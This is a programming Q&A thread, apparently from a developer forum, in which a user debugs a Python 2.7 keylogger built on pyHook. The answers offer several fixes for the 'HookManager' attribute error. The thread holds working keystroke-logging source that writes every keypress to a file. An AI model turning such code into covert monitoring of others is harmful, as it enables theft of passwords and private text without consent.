# No attribute 'HookManager'

Tags: attributes, keylogger, pyhook

I am copying the key logger from this video: (https://www.youtube.com/watch?v=8BiOPBsXh0g) and running the code:

```
    import pyHook, sys, logging, pythoncom

    file_log = 'C:\Users\User\Google Drive\Python'

    def OnKeyboardEvent(event):
        logging.basicConfig(filename = file_log, level = logging.DEBUG, format = '%(message)s')
        chr(event.Ascii)
        logging.log(10, chr(event.Ascii))
        return True

    hooks_manager = pyHook.HookManager()
    hooks_manager.KeyDown = OnKeyboardEvent
    hooks_manager.HookKeyboard()
    pythoncom.Pumpmessages()
```

This returns the error:

```
    Traceback (most recent call last):
      File "C:\Users\User\Google Drive\Python\pyHook.py", line 2, in  <module>
        import pyHook, sys, logging, pythoncom
      File "C:\Users\User\Google Drive\Python\pyHook.py", line 12, in <module>
        hooks_manager = pyHook.HookManager()
    AttributeError: 'module' object has no attribute 'HookManager'
```

I am running Python 2.7.11 and a windows computer.
I don't know what the problem is; please help.
Thank you

Answer (score 0, accepted):

I'm still unsure what the issue is but I found a solution.
If you move the program you are trying to run into the same folder as the HookManager.py file then it works.

For me this file was:
C:\Python27\Lib\site-packages\pyHook

Answer (score 1):

I found the solution. If you open HookManager.py and change all 'key_hook' words to 'keyboard_hook' no more error occurs

Comment: how come this solution is so different from the accepted answer?

Comment: different solution.

Answer (score 0):

Bro this line is wrong

> `file_log = 'C:\Users\User\Google Drive\Python'`

As the system doesn't allow your program to write to the 'C' drive, you should use another path, like 'D' drive or 'E' drive or etc. as given below.

```
file_log = 'D:\keyloggerOutput.txt'
```

Comment: Thanks for the help but this didn't seem to resolve the issue, I do now have a working version of the program however. Thanks for taking the time to answer my question

Comment: bro i have tested this program and it's working fine.

Answer (score 0):

I had same message error after having installed pyWinhook-1.6.1 on Python 3.7 with the zip file pyWinhook-1.6.1.zip.
In application file, I replaced the import statement:" import pyWinhook as pyHook" with "from pywinhook import *". The problem was then solved.